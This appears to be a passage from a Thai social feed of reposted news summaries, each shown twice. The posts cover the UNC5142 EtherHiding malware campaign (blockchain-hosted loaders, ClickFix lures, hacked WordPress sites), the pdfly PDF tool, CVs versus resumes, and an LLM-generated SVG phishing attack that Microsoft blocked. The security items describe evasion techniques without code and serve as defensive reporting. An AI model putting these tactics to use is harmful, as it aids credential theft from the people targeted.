    มัลแวร์ที่ใช้: CLEARSHORT, VIDAR, LUMMAC.V2, RADTHIEF, ATOMIC
    ครอบคลุมทั้ง Windows และ macOS

    โครงสร้าง infrastructure แบบคู่ขนาน (Main และ Secondary)
    ใช้ wallet ที่เชื่อมโยงกับ OKX exchange

    https://securityonline.info/unc5142-uses-etherhiding-to-deploy-malware-via-bnb-smart-chain-smart-contracts/
    🛡️ “UNC5142 ใช้ EtherHiding บน BNB Smart Chain เพื่อแพร่มัลแวร์ — เมื่อบล็อกเชนกลายเป็นเครื่องมืออาชญากรรมไซเบอร์” — จาก WordPress สู่ Smart Contract: การโจมตีที่ล่องหนและยากจะหยุด รายงานร่วมจาก Mandiant และ Google Threat Intelligence Group (GTIG) เปิดเผยการโจมตีไซเบอร์รูปแบบใหม่โดยกลุ่ม UNC5142 ซึ่งใช้เทคนิค “EtherHiding” บน BNB Smart Chain เพื่อซ่อนและส่งมัลแวร์ผ่าน smart contracts โดยไม่ต้องใช้เซิร์ฟเวอร์แบบเดิม แทนที่จะโฮสต์มัลแวร์บนโดเมนหรือ IP ที่สามารถถูกบล็อกได้ UNC5142 ฝัง payload ไว้ใน smart contract ที่อยู่บนบล็อกเชน ซึ่งมีคุณสมบัติ “เปลี่ยนไม่ได้” และ “ลบไม่ได้” ทำให้การตรวจจับและการลบแทบเป็นไปไม่ได้ มัลแวร์เริ่มต้นจากการฝัง JavaScript บนเว็บไซต์ WordPress ที่ถูกเจาะ ซึ่งโหลดตัวดาวน์โหลดชื่อ CLEARSHORT — ตัวนี้จะเชื่อมต่อกับ BNB Smart Chain ผ่าน Web3.js เพื่อดึงสคริปต์ถัดไปจาก smart contract และแสดงหน้าต่างหลอกลวง เช่น “อัปเดตระบบ” หรือ “ตรวจสอบความปลอดภัย” เพื่อหลอกให้ผู้ใช้คลิก ระบบ smart contract ที่ใช้มี 3 ชั้น: 1️⃣ ชั้นแรก: ทำหน้าที่เป็น router ชี้ไปยัง contract ถัดไป 2️⃣ ชั้นสอง: ทำ reconnaissance และ fingerprinting เหยื่อ 3️⃣ ชั้นสาม: เก็บ URL ของ payload และคีย์ AES สำหรับถอดรหัส การอัปเดต payload หรือคีย์สามารถทำได้ด้วยธุรกรรมราคาถูก (ประมาณ $0.25–$1.50) โดยไม่ต้องเปลี่ยนโค้ดหลักของ contract — ทำให้ระบบมีความยืดหยุ่นสูงและต้นทุนต่ำ UNC5142 ยังใช้ Cloudflare Pages เพื่อโฮสต์หน้า phishing เช่น reCAPTCHA ปลอม, หน้าความเป็นส่วนตัวปลอม, และหน้าตรวจสอบ bot ปลอม ซึ่งหลอกผู้ใช้ให้คลิกและติดมัลแวร์ มัลแวร์ที่ใช้มีหลายตัว เช่น: 🐛 CLEARSHORT: JavaScript downloader 🐛 VIDAR และ LUMMAC.V2: สำหรับ Windows 🐛 RADTHIEF: ขโมย credentials 🐛 ATOMIC: สำหรับ macOS — ใช้ bash script และ bypass quarantine กลุ่มนี้ยังมีโครงสร้าง infrastructure แบบคู่ขนาน (Main และ Secondary) เพื่อหลบเลี่ยงการถูกปิดระบบ และใช้ wallet ที่เชื่อมโยงกับ OKX exchange ในการจ่ายค่าธุรกรรม ✅ UNC5142 ใช้ EtherHiding บน BNB Smart Chain เพื่อแพร่มัลแวร์ ➡️ ฝัง payload ใน smart contract ที่ลบไม่ได้ ✅ เริ่มต้นจากเว็บไซต์ WordPress ที่ถูกเจาะ ➡️ โหลด CLEARSHORT JavaScript downloader ✅ ใช้ Web3.js เชื่อมต่อกับ smart contract เพื่อดึง payload ➡️ แสดงหน้าต่างหลอกลวงให้เหยื่อคลิก ✅ Smart contract มี 3 ชั้น: router → reconnaissance → payload ➡️ อัปเดตได้ด้วยธุรกรรมราคาถูก ✅ ใช้ Cloudflare Pages เพื่อโฮสต์หน้า phishing ➡️ เช่น reCAPTCHA ปลอม และหน้าตรวจสอบ bot ✅ มัลแวร์ที่ใช้: CLEARSHORT, VIDAR, LUMMAC.V2, RADTHIEF, ATOMIC ➡️ ครอบคลุมทั้ง Windows และ macOS ✅ โครงสร้าง infrastructure แบบคู่ขนาน (Main และ Secondary) ➡️ ใช้ wallet ที่เชื่อมโยงกับ OKX exchange https://securityonline.info/unc5142-uses-etherhiding-to-deploy-malware-via-bnb-smart-chain-smart-contracts/
    SECURITYONLINE.INFO
    UNC5142 Uses EtherHiding to Deploy Malware via BNB Smart Chain Smart Contracts
    Mandiant exposed UNC5142 for using EtherHiding—hiding malicious JavaScript in BNB Smart Chain smart contracts—to create a resilient C2 and distribute VIDAR/ATOMIC to 14,000+ sites.
    0 ความคิดเห็น 0 การแบ่งปัน 271 มุมมอง 0 รีวิว
  • “แฮ็กเกอร์ใช้เว็บ WordPress กว่า 14,000 แห่งแพร่มัลแวร์ผ่านบล็อกเชน” — เมื่อ ClickFix และ CLEARSHOT กลายเป็นอาวุธใหม่ในสงครามไซเบอร์

    Google Threat Intelligence Group (GTIG) เปิดเผยว่า กลุ่มแฮ็กเกอร์ UNC5142 ได้เจาะระบบเว็บไซต์ WordPress กว่า 14,000 แห่งทั่วโลก เพื่อใช้เป็นฐานปล่อยมัลแวร์ โดยอาศัยเทคนิคใหม่ที่ผสาน JavaScript downloader กับบล็อกเชนสาธารณะเพื่อหลบเลี่ยงการตรวจจับและการปิดระบบ

    มัลแวร์ถูกส่งผ่านตัวดาวน์โหลดชื่อ “CLEARSHOT” ซึ่งฝังอยู่ในเว็บไซต์ที่ถูกแฮ็ก และจะดึง payload ระยะที่สองจากบล็อกเชน BNB chain โดยตรง จากนั้นจะโหลดหน้า landing page ที่เรียกว่า “CLEARSHORT” ซึ่งใช้กลยุทธ์ ClickFix หลอกให้เหยื่อคัดลอกคำสั่งไปวางใน Run (Windows) หรือ Terminal (Mac) เพื่อรันมัลแวร์ด้วยตัวเอง

    การใช้บล็อกเชนทำให้โครงสร้างพื้นฐานของแฮ็กเกอร์มีความทนทานต่อการตรวจจับและการปิดระบบ เพราะข้อมูลไม่สามารถลบหรือเปลี่ยนแปลงได้ง่ายเหมือนเว็บทั่วไป

    แม้กลุ่ม UNC5142 จะหยุดปฏิบัติการในเดือนกรกฎาคม 2025 แต่ GTIG เชื่อว่าพวกเขาอาจยังคงเคลื่อนไหวอยู่ โดยเปลี่ยนเทคนิคให้ซับซ้อนและตรวจจับยากขึ้น

    กลุ่ม UNC5142 เจาะระบบเว็บไซต์ WordPress กว่า 14,000 แห่ง
    ใช้ช่องโหว่ในปลั๊กอิน, ธีม และฐานข้อมูล

    ใช้ JavaScript downloader ชื่อ “CLEARSHOT” เพื่อกระจายมัลแวร์
    ดึง payload ระยะที่สองจากบล็อกเชน BNB chain

    หน้า landing page “CLEARSHORT” ใช้กลยุทธ์ ClickFix
    หลอกให้เหยื่อคัดลอกคำสั่งไปวางใน Run หรือ Terminal

    มัลแวร์ถูกโหลดจากเซิร์ฟเวอร์ภายนอกผ่าน Cloudflare .dev
    ข้อมูลถูกเข้ารหัสเพื่อหลบเลี่ยงการตรวจจับ

    การใช้บล็อกเชนเพิ่มความทนทานต่อการปิดระบบ
    เพราะข้อมูลไม่สามารถลบหรือเปลี่ยนแปลงได้ง่าย

    GTIG เชื่อว่า UNC5142 ยังไม่เลิกปฏิบัติการจริง
    อาจเปลี่ยนเทคนิคเพื่อหลบเลี่ยงการตรวจจับ

    https://www.techradar.com/pro/security/thousands-of-web-pages-abused-by-hackers-to-spread-malware
    🕷️ “แฮ็กเกอร์ใช้เว็บ WordPress กว่า 14,000 แห่งแพร่มัลแวร์ผ่านบล็อกเชน” — เมื่อ ClickFix และ CLEARSHOT กลายเป็นอาวุธใหม่ในสงครามไซเบอร์ Google Threat Intelligence Group (GTIG) เปิดเผยว่า กลุ่มแฮ็กเกอร์ UNC5142 ได้เจาะระบบเว็บไซต์ WordPress กว่า 14,000 แห่งทั่วโลก เพื่อใช้เป็นฐานปล่อยมัลแวร์ โดยอาศัยเทคนิคใหม่ที่ผสาน JavaScript downloader กับบล็อกเชนสาธารณะเพื่อหลบเลี่ยงการตรวจจับและการปิดระบบ มัลแวร์ถูกส่งผ่านตัวดาวน์โหลดชื่อ “CLEARSHOT” ซึ่งฝังอยู่ในเว็บไซต์ที่ถูกแฮ็ก และจะดึง payload ระยะที่สองจากบล็อกเชน BNB chain โดยตรง จากนั้นจะโหลดหน้า landing page ที่เรียกว่า “CLEARSHORT” ซึ่งใช้กลยุทธ์ ClickFix หลอกให้เหยื่อคัดลอกคำสั่งไปวางใน Run (Windows) หรือ Terminal (Mac) เพื่อรันมัลแวร์ด้วยตัวเอง การใช้บล็อกเชนทำให้โครงสร้างพื้นฐานของแฮ็กเกอร์มีความทนทานต่อการตรวจจับและการปิดระบบ เพราะข้อมูลไม่สามารถลบหรือเปลี่ยนแปลงได้ง่ายเหมือนเว็บทั่วไป แม้กลุ่ม UNC5142 จะหยุดปฏิบัติการในเดือนกรกฎาคม 2025 แต่ GTIG เชื่อว่าพวกเขาอาจยังคงเคลื่อนไหวอยู่ โดยเปลี่ยนเทคนิคให้ซับซ้อนและตรวจจับยากขึ้น ✅ กลุ่ม UNC5142 เจาะระบบเว็บไซต์ WordPress กว่า 14,000 แห่ง ➡️ ใช้ช่องโหว่ในปลั๊กอิน, ธีม และฐานข้อมูล ✅ ใช้ JavaScript downloader ชื่อ “CLEARSHOT” เพื่อกระจายมัลแวร์ ➡️ ดึง payload ระยะที่สองจากบล็อกเชน BNB chain ✅ หน้า landing page “CLEARSHORT” ใช้กลยุทธ์ ClickFix ➡️ หลอกให้เหยื่อคัดลอกคำสั่งไปวางใน Run หรือ Terminal ✅ มัลแวร์ถูกโหลดจากเซิร์ฟเวอร์ภายนอกผ่าน Cloudflare .dev ➡️ ข้อมูลถูกเข้ารหัสเพื่อหลบเลี่ยงการตรวจจับ ✅ การใช้บล็อกเชนเพิ่มความทนทานต่อการปิดระบบ ➡️ เพราะข้อมูลไม่สามารถลบหรือเปลี่ยนแปลงได้ง่าย ✅ GTIG เชื่อว่า UNC5142 ยังไม่เลิกปฏิบัติการจริง ➡️ อาจเปลี่ยนเทคนิคเพื่อหลบเลี่ยงการตรวจจับ https://www.techradar.com/pro/security/thousands-of-web-pages-abused-by-hackers-to-spread-malware
    WWW.TECHRADAR.COM
    Thousands of web pages abused by hackers to spread malware
    More than 14,000 websites were seen distributing malware
    0 ความคิดเห็น 0 การแบ่งปัน 315 มุมมอง 0 รีวิว
  • “pdfly: เครื่องมือสารพัดประโยชน์สำหรับจัดการไฟล์ PDF — จาก CLI สู่การเซ็นเอกสารและสร้าง booklet ได้ในคำสั่งเดียว”

    pdfly คือโปรเจกต์ใหม่ล่าสุดจากองค์กร py-pdf ที่เปิดตัวในปี 2022 โดย Martin Thoma เป็นเครื่องมือแบบ CLI (Command Line Interface) ที่เขียนด้วยภาษา Python โดยอิงจากไลบรารี fpdf2 และ pypdf จุดเด่นของ pdfly คือความสามารถในการจัดการไฟล์ PDF ได้หลากหลายรูปแบบ ตั้งแต่การดู metadata ไปจนถึงการเซ็นเอกสารและสร้าง booklet

    ในเวอร์ชันล่าสุด 0.5.0 ซึ่งเปิดตัวในเดือนตุลาคม 2025 มีฟีเจอร์ใหม่หลายอย่างที่เกิดจากการร่วมพัฒนาของนักพัฒนาผ่านกิจกรรม Hacktoberfest เช่น:

    pdfly sign สำหรับเซ็นเอกสาร PDF
    pdfly check-sign สำหรับตรวจสอบลายเซ็น
    pdfly extract-annotated-pages สำหรับดึงเฉพาะหน้าที่มี annotation
    pdfly rotate สำหรับหมุนหน้าต่าง ๆ ในเอกสาร

    นอกจากนี้ pdfly ยังสามารถรวมไฟล์ PDF (pdfly cat), ลบหน้า (pdfly rm), แปลงภาพเป็น PDF (pdfly x2pdf), บีบอัดไฟล์ (pdfly compress), สร้าง booklet (pdfly booklet) และแก้ไข xref table ที่เสียหายจากการแก้ไขด้วย text editor (pdfly update-offsets) ได้อีกด้วย

    https://chezsoi.org/lucas/blog/spotlight-on-pdfly.html
    📄 “pdfly: เครื่องมือสารพัดประโยชน์สำหรับจัดการไฟล์ PDF — จาก CLI สู่การเซ็นเอกสารและสร้าง booklet ได้ในคำสั่งเดียว” pdfly คือโปรเจกต์ใหม่ล่าสุดจากองค์กร py-pdf ที่เปิดตัวในปี 2022 โดย Martin Thoma เป็นเครื่องมือแบบ CLI (Command Line Interface) ที่เขียนด้วยภาษา Python โดยอิงจากไลบรารี fpdf2 และ pypdf จุดเด่นของ pdfly คือความสามารถในการจัดการไฟล์ PDF ได้หลากหลายรูปแบบ ตั้งแต่การดู metadata ไปจนถึงการเซ็นเอกสารและสร้าง booklet ในเวอร์ชันล่าสุด 0.5.0 ซึ่งเปิดตัวในเดือนตุลาคม 2025 มีฟีเจอร์ใหม่หลายอย่างที่เกิดจากการร่วมพัฒนาของนักพัฒนาผ่านกิจกรรม Hacktoberfest เช่น: ✒️ pdfly sign สำหรับเซ็นเอกสาร PDF ✒️ pdfly check-sign สำหรับตรวจสอบลายเซ็น ✒️ pdfly extract-annotated-pages สำหรับดึงเฉพาะหน้าที่มี annotation ✒️ pdfly rotate สำหรับหมุนหน้าต่าง ๆ ในเอกสาร นอกจากนี้ pdfly ยังสามารถรวมไฟล์ PDF (pdfly cat), ลบหน้า (pdfly rm), แปลงภาพเป็น PDF (pdfly x2pdf), บีบอัดไฟล์ (pdfly compress), สร้าง booklet (pdfly booklet) และแก้ไข xref table ที่เสียหายจากการแก้ไขด้วย text editor (pdfly update-offsets) ได้อีกด้วย https://chezsoi.org/lucas/blog/spotlight-on-pdfly.html
    CHEZSOI.ORG
    Spotlight on pdfly, the Swiss Army knife for PDF files
    Project documentation: pdfly.readthedocs.io pdfly is the youngest project of the py-pdf organization. It has been created by Martin Thoma in 2022. It's simply a CLI tool to manipulate PDF files, written in Python and based on the fpdf2 & pypdf libraries. I'm a maintainer of the project 🙂 What can …
    0 ความคิดเห็น 0 การแบ่งปัน 163 มุมมอง 0 รีวิว
  • CV vs. Resume: What Are The Differences?

    When applying for jobs, you’ll need to prove to prospective employers that you have plenty of experience and accomplishments. In order to do this, you’ll need to show them either a CV or a resume. For American workers, these two terms are often used interchangeably to refer to a document that lists a person’s past work and major accomplishments. However, there are several differences between the two and confusing one for the other could majorly hurt your chances of landing that coveted position. To avoid disaster, let’s learn more about the difference between a CV and a resume.

    What is a CV?
    CV is short for curriculum vitae. A CV is a document that lists in detail a person’s education, certifications, professional background, professional expertise, publications (books, research papers, etc.), teaching experience, presentations, awards, grants, and research projects. A CV is compiled by a person applying for a job, fellowship, grant, or international career position.

    Typically, a CV is tailored to fit whatever position a person is applying for, with more relevant or valuable skills and experiences prioritized over others. A CV usually begins with a person’s educational qualifications, such as university degrees, fellowships, grants, and teaching experience. Most CVs are quite long and detailed, often listing many years worth of a person’s accomplishments and published works. Depending on the person, a CV that lists all of a person’s published books, lectures, and research papers could potentially be many pages in length.

    CV vs. resume
    In general, CVs and resumes often contain similar information, are often both used to apply for jobs, and are both used to list a person’s experiences, skills, and accomplishments. The main differences between the two often have to do with length, what information is specifically listed, and what type of position a person is applying for. The purpose and specifics of CVs and resumes also vary depending on whether a person lives/works in the US/Canada versus another country.

    When to use a CV
    While it depends on the specific occasion, CVs are typically used in the United States and Canada when a person is applying for a fellowship, grant, or a job specifically in academia, medicine, or a research field. All of these are typically more concerned with a person’s credentials and expertise and thus require a detailed account of a person’s educational and research background.

    Outside of the US and Canada, CVs are typically used as the standard document that a person submits when applying to a job in any field. If an American or Canadian citizen is applying for an international position, they will typically need to submit a CV rather than a resume.

    When to use a resume
    In general, a resume is the document that most American and Canadian companies expect from an applicant looking for a job. Besides the particular fields mentioned above, most businesses in America and Canada will ask an applicant to submit a resume rather than a CV. Generally speaking, businesses are more interested in an applicant’s career experiences, prior jobs, training, skills, and career accomplishments than academic accomplishments.

    When applying for a job, most Americans and Canadians will be required to submit a resume (and possibly a cover letter). This shorter, more concise document is often preferred if a company uses automated review software or receives a large number of applications.

    Most of the time, an organization will make it clear whether they require a CV, resume, or even both. If you live in Canada or the US, you should expect to need a resume most of the time. If you live anywhere else, you should expect to write a CV. If you are unsure which is needed, it is best to ask for clarification.

    What is a resume?
    A resume is a summary of a person’s past work experience, career accomplishments, personal accomplishments, skills, and qualifications. A resume is the document that Americans and Canadians need to have when applying for most jobs.

    Like a CV, a resume is typically adjusted to fit the specific job that a person is applying for, with more important or relevant experiences and accomplishments given priority. Typically, resumes are relatively short, usually only being one or two pages in length. In general, resumes lead with job histories and career accomplishments. While CVs tend to emphasize a person’s academic credentials, a resume tends to focus much more on what a person has done in their past work and how they can use that to succeed at a new job.

    In our comprehensive resume guide, we’ve provided three sample resumes you can use to follow along in this series and create your own format.

    CV vs. resume
    In general, CVs and resumes often contain similar information, are often both used to apply for jobs, and are both used to list a person’s experiences, skills, and accomplishments. The main differences between the two often have to do with length, what information is specifically listed, and what type of position a person is applying for. The purpose and specifics of CVs and resumes also vary depending on whether a person lives/works in the US/Canada versus another country.

    When to use a CV
    While it depends on the specific occasion, CVs are typically used in the United States and Canada when a person is applying for a fellowship, grant, or a job specifically in academia, medicine, or a research field. All of these are typically more concerned with a person’s credentials and expertise and thus require a detailed account of a person’s educational and research background.

    Outside of the US and Canada, CVs are typically used as the standard document that a person submits when applying to a job in any field. If an American or Canadian citizen is applying for an international position, they will typically need to submit a CV rather than a resume.

    When to use a resume
    In general, a resume is the document that most American and Canadian companies expect from an applicant looking for a job. Besides the particular fields mentioned above, most businesses in America and Canada will ask an applicant to submit a resume rather than a CV. Generally speaking, businesses are more interested in an applicant’s career experiences, prior jobs, training, skills, and career accomplishments than academic accomplishments.

    When applying for a job, most Americans and Canadians will be required to submit a resume (and possibly a cover letter). This shorter, more concise document is often preferred if a company uses automated review software or receives a large number of applications.

    Most of the time, an organization will make it clear whether they require a CV, resume, or even both. If you live in Canada or the US, you should expect to need a resume most of the time. If you live anywhere else, you should expect to write a CV. If you are unsure which is needed, it is best to ask for clarification.

    © 2025, Aakkhra, All rights reserved.
    CV vs. Resume: What Are The Differences? When applying for jobs, you’ll need to prove to prospective employers that you have plenty of experience and accomplishments. In order to do this, you’ll need to show them either a CV or a resume. For American workers, these two terms are often used interchangeably to refer to a document that lists a person’s past work and major accomplishments. However, there are several differences between the two and confusing one for the other could majorly hurt your chances of landing that coveted position. To avoid disaster, let’s learn more about the difference between a CV and a resume. What is a CV? CV is short for curriculum vitae. A CV is a document that lists in detail a person’s education, certifications, professional background, professional expertise, publications (books, research papers, etc.), teaching experience, presentations, awards, grants, and research projects. A CV is compiled by a person applying for a job, fellowship, grant, or international career position. Typically, a CV is tailored to fit whatever position a person is applying for, with more relevant or valuable skills and experiences prioritized over others. A CV usually begins with a person’s educational qualifications, such as university degrees, fellowships, grants, and teaching experience. Most CVs are quite long and detailed, often listing many years worth of a person’s accomplishments and published works. Depending on the person, a CV that lists all of a person’s published books, lectures, and research papers could potentially be many pages in length. CV vs. resume In general, CVs and resumes often contain similar information, are often both used to apply for jobs, and are both used to list a person’s experiences, skills, and accomplishments. The main differences between the two often have to do with length, what information is specifically listed, and what type of position a person is applying for. The purpose and specifics of CVs and resumes also vary depending on whether a person lives/works in the US/Canada versus another country. When to use a CV While it depends on the specific occasion, CVs are typically used in the United States and Canada when a person is applying for a fellowship, grant, or a job specifically in academia, medicine, or a research field. All of these are typically more concerned with a person’s credentials and expertise and thus require a detailed account of a person’s educational and research background. Outside of the US and Canada, CVs are typically used as the standard document that a person submits when applying to a job in any field. If an American or Canadian citizen is applying for an international position, they will typically need to submit a CV rather than a resume. When to use a resume In general, a resume is the document that most American and Canadian companies expect from an applicant looking for a job. Besides the particular fields mentioned above, most businesses in America and Canada will ask an applicant to submit a resume rather than a CV. Generally speaking, businesses are more interested in an applicant’s career experiences, prior jobs, training, skills, and career accomplishments than academic accomplishments. When applying for a job, most Americans and Canadians will be required to submit a resume (and possibly a cover letter). This shorter, more concise document is often preferred if a company uses automated review software or receives a large number of applications. Most of the time, an organization will make it clear whether they require a CV, resume, or even both. If you live in Canada or the US, you should expect to need a resume most of the time. If you live anywhere else, you should expect to write a CV. If you are unsure which is needed, it is best to ask for clarification. What is a resume? A resume is a summary of a person’s past work experience, career accomplishments, personal accomplishments, skills, and qualifications. A resume is the document that Americans and Canadians need to have when applying for most jobs. Like a CV, a resume is typically adjusted to fit the specific job that a person is applying for, with more important or relevant experiences and accomplishments given priority. Typically, resumes are relatively short, usually only being one or two pages in length. In general, resumes lead with job histories and career accomplishments. While CVs tend to emphasize a person’s academic credentials, a resume tends to focus much more on what a person has done in their past work and how they can use that to succeed at a new job. In our comprehensive resume guide, we’ve provided three sample resumes you can use to follow along in this series and create your own format. CV vs. resume In general, CVs and resumes often contain similar information, are often both used to apply for jobs, and are both used to list a person’s experiences, skills, and accomplishments. The main differences between the two often have to do with length, what information is specifically listed, and what type of position a person is applying for. The purpose and specifics of CVs and resumes also vary depending on whether a person lives/works in the US/Canada versus another country. When to use a CV While it depends on the specific occasion, CVs are typically used in the United States and Canada when a person is applying for a fellowship, grant, or a job specifically in academia, medicine, or a research field. All of these are typically more concerned with a person’s credentials and expertise and thus require a detailed account of a person’s educational and research background. Outside of the US and Canada, CVs are typically used as the standard document that a person submits when applying to a job in any field. If an American or Canadian citizen is applying for an international position, they will typically need to submit a CV rather than a resume. When to use a resume In general, a resume is the document that most American and Canadian companies expect from an applicant looking for a job. Besides the particular fields mentioned above, most businesses in America and Canada will ask an applicant to submit a resume rather than a CV. Generally speaking, businesses are more interested in an applicant’s career experiences, prior jobs, training, skills, and career accomplishments than academic accomplishments. When applying for a job, most Americans and Canadians will be required to submit a resume (and possibly a cover letter). This shorter, more concise document is often preferred if a company uses automated review software or receives a large number of applications. Most of the time, an organization will make it clear whether they require a CV, resume, or even both. If you live in Canada or the US, you should expect to need a resume most of the time. If you live anywhere else, you should expect to write a CV. If you are unsure which is needed, it is best to ask for clarification. © 2025, Aakkhra, All rights reserved.
    0 ความคิดเห็น 0 การแบ่งปัน 658 มุมมอง 0 รีวิว
  • “AI ปะทะ AI — Microsoft สกัดมัลแวร์ SVG ที่สร้างโดย LLM ก่อนหลอกขโมยรหัสผ่านองค์กร”

    ในวันที่ AI กลายเป็นทั้งเครื่องมือป้องกันและอาวุธของผู้โจมตี Microsoft ได้เปิดเผยรายละเอียดของแคมเปญฟิชชิ่งที่ใช้โค้ดที่สร้างโดย LLM (Large Language Model) เพื่อหลบเลี่ยงระบบตรวจจับแบบเดิม โดยมัลแวร์ถูกฝังในไฟล์ SVG ที่ปลอมตัวเป็น PDF และใช้เทคนิคการซ่อนข้อมูลที่ซับซ้อนจนแม้แต่นักวิเคราะห์ยังต้องพึ่ง AI เพื่อถอดรหัส

    แคมเปญนี้ถูกตรวจพบเมื่อวันที่ 18 สิงหาคม 2025 โดยเริ่มจากบัญชีอีเมลของธุรกิจขนาดเล็กที่ถูกแฮก แล้วส่งอีเมลไปยังเหยื่อผ่านช่องทาง BCC เพื่อหลบเลี่ยงการตรวจจับ โดยแนบไฟล์ชื่อ “23mb – PDF-6 pages.svg” ซึ่งดูเหมือนเอกสารธุรกิจทั่วไป แต่เมื่อเปิดขึ้นจะพาไปยังหน้า CAPTCHA ปลอม ก่อนนำไปสู่หน้าขโมยรหัสผ่าน

    สิ่งที่ทำให้แคมเปญนี้โดดเด่นคือการใช้โค้ดที่ซับซ้อนเกินกว่าที่มนุษย์จะเขียนเองได้ เช่น การใช้คำศัพท์ธุรกิจอย่าง “revenue,” “operations,” และ “risk” ซ่อนอยู่ในแอตทริบิวต์ของ SVG และถูกแปลงเป็น payload ที่สามารถรันได้ รวมถึงการใช้ CDATA และ XML declaration ที่ถูกต้องแต่ไม่จำเป็น ซึ่งเป็นลักษณะเฉพาะของโค้ดที่สร้างโดย AI

    Microsoft Security Copilot ซึ่งเป็นระบบ AI สำหรับวิเคราะห์ภัยคุกคาม ได้ตรวจพบลักษณะของโค้ดที่บ่งชี้ว่าเป็นผลผลิตของ LLM เช่น การตั้งชื่อฟังก์ชันที่ยาวเกินจำเป็น, โครงสร้างโค้ดแบบ modular ที่เกินความจำเป็น, และคอมเมนต์ที่เขียนด้วยภาษาทางธุรกิจอย่างเป็นทางการ

    แม้การโจมตีจะซับซ้อน แต่ Microsoft Defender for Office 365 ก็สามารถสกัดไว้ได้ โดยอาศัยการตรวจจับจากหลายปัจจัย เช่น ชื่อไฟล์ที่ผิดปกติ, การใช้ SVG เป็น payload, และพฤติกรรมการ redirect ที่ไม่ธรรมดา ซึ่งแสดงให้เห็นว่าแม้ AI จะถูกใช้ในฝั่งผู้โจมตี แต่ก็สามารถถูกใช้ในฝั่งป้องกันได้อย่างมีประสิทธิภาพเช่นกัน

    ข้อมูลสำคัญจากข่าว
    Microsoft ตรวจพบแคมเปญฟิชชิ่งที่ใช้โค้ดที่สร้างโดย LLM ฝังในไฟล์ SVG
    ไฟล์ SVG ปลอมตัวเป็น PDF และ redirect ไปยังหน้า CAPTCHA ปลอมก่อนขโมยรหัสผ่าน
    โค้ดมีลักษณะเฉพาะของ AI เช่น verbose naming, modular structure, และ business-style comments
    ใช้คำศัพท์ธุรกิจซ่อนในแอตทริบิวต์ของ SVG แล้วแปลงเป็น payload
    ใช้ CDATA และ XML declaration อย่างถูกต้องแต่ไม่จำเป็น
    อีเมลถูกส่งจากบัญชีที่ถูกแฮก โดยใช้ BCC เพื่อหลบการตรวจจับ
    Microsoft Defender for Office 365 สกัดการโจมตีได้สำเร็จ
    Security Copilot ใช้ AI วิเคราะห์และระบุว่าโค้ดไม่ใช่สิ่งที่มนุษย์เขียนเอง
    การตรวจจับอาศัยชื่อไฟล์, รูปแบบ SVG, redirect pattern และ session tracking

    ข้อมูลเสริมจากภายนอก
    SVG ถูกใช้เป็นช่องทางโจมตีมากขึ้น เพราะสามารถฝัง JavaScript และ HTML ได้
    LLM เช่น GPT สามารถสร้างโค้ดที่ซับซ้อนและหลบเลี่ยงการตรวจจับได้
    Security Copilot เป็นระบบ AI ที่ Microsoft พัฒนาเพื่อช่วยวิเคราะห์ภัยคุกคามแบบเรียลไทม์
    การใช้ CAPTCHA ปลอมเป็นเทคนิคที่ช่วยสร้างความน่าเชื่อถือก่อนหลอกเหยื่อ
    การโจมตีแบบนี้สะท้อนแนวโน้ม “AI vs. AI” ที่ทั้งสองฝ่ายใช้เทคโนโลยีเดียวกัน

    https://securityonline.info/ai-vs-ai-microsoft-blocks-phishing-attack-using-llm-generated-obfuscated-code/
    🤖 “AI ปะทะ AI — Microsoft สกัดมัลแวร์ SVG ที่สร้างโดย LLM ก่อนหลอกขโมยรหัสผ่านองค์กร” ในวันที่ AI กลายเป็นทั้งเครื่องมือป้องกันและอาวุธของผู้โจมตี Microsoft ได้เปิดเผยรายละเอียดของแคมเปญฟิชชิ่งที่ใช้โค้ดที่สร้างโดย LLM (Large Language Model) เพื่อหลบเลี่ยงระบบตรวจจับแบบเดิม โดยมัลแวร์ถูกฝังในไฟล์ SVG ที่ปลอมตัวเป็น PDF และใช้เทคนิคการซ่อนข้อมูลที่ซับซ้อนจนแม้แต่นักวิเคราะห์ยังต้องพึ่ง AI เพื่อถอดรหัส แคมเปญนี้ถูกตรวจพบเมื่อวันที่ 18 สิงหาคม 2025 โดยเริ่มจากบัญชีอีเมลของธุรกิจขนาดเล็กที่ถูกแฮก แล้วส่งอีเมลไปยังเหยื่อผ่านช่องทาง BCC เพื่อหลบเลี่ยงการตรวจจับ โดยแนบไฟล์ชื่อ “23mb – PDF-6 pages.svg” ซึ่งดูเหมือนเอกสารธุรกิจทั่วไป แต่เมื่อเปิดขึ้นจะพาไปยังหน้า CAPTCHA ปลอม ก่อนนำไปสู่หน้าขโมยรหัสผ่าน สิ่งที่ทำให้แคมเปญนี้โดดเด่นคือการใช้โค้ดที่ซับซ้อนเกินกว่าที่มนุษย์จะเขียนเองได้ เช่น การใช้คำศัพท์ธุรกิจอย่าง “revenue,” “operations,” และ “risk” ซ่อนอยู่ในแอตทริบิวต์ของ SVG และถูกแปลงเป็น payload ที่สามารถรันได้ รวมถึงการใช้ CDATA และ XML declaration ที่ถูกต้องแต่ไม่จำเป็น ซึ่งเป็นลักษณะเฉพาะของโค้ดที่สร้างโดย AI Microsoft Security Copilot ซึ่งเป็นระบบ AI สำหรับวิเคราะห์ภัยคุกคาม ได้ตรวจพบลักษณะของโค้ดที่บ่งชี้ว่าเป็นผลผลิตของ LLM เช่น การตั้งชื่อฟังก์ชันที่ยาวเกินจำเป็น, โครงสร้างโค้ดแบบ modular ที่เกินความจำเป็น, และคอมเมนต์ที่เขียนด้วยภาษาทางธุรกิจอย่างเป็นทางการ แม้การโจมตีจะซับซ้อน แต่ Microsoft Defender for Office 365 ก็สามารถสกัดไว้ได้ โดยอาศัยการตรวจจับจากหลายปัจจัย เช่น ชื่อไฟล์ที่ผิดปกติ, การใช้ SVG เป็น payload, และพฤติกรรมการ redirect ที่ไม่ธรรมดา ซึ่งแสดงให้เห็นว่าแม้ AI จะถูกใช้ในฝั่งผู้โจมตี แต่ก็สามารถถูกใช้ในฝั่งป้องกันได้อย่างมีประสิทธิภาพเช่นกัน ✅ ข้อมูลสำคัญจากข่าว ➡️ Microsoft ตรวจพบแคมเปญฟิชชิ่งที่ใช้โค้ดที่สร้างโดย LLM ฝังในไฟล์ SVG ➡️ ไฟล์ SVG ปลอมตัวเป็น PDF และ redirect ไปยังหน้า CAPTCHA ปลอมก่อนขโมยรหัสผ่าน ➡️ โค้ดมีลักษณะเฉพาะของ AI เช่น verbose naming, modular structure, และ business-style comments ➡️ ใช้คำศัพท์ธุรกิจซ่อนในแอตทริบิวต์ของ SVG แล้วแปลงเป็น payload ➡️ ใช้ CDATA และ XML declaration 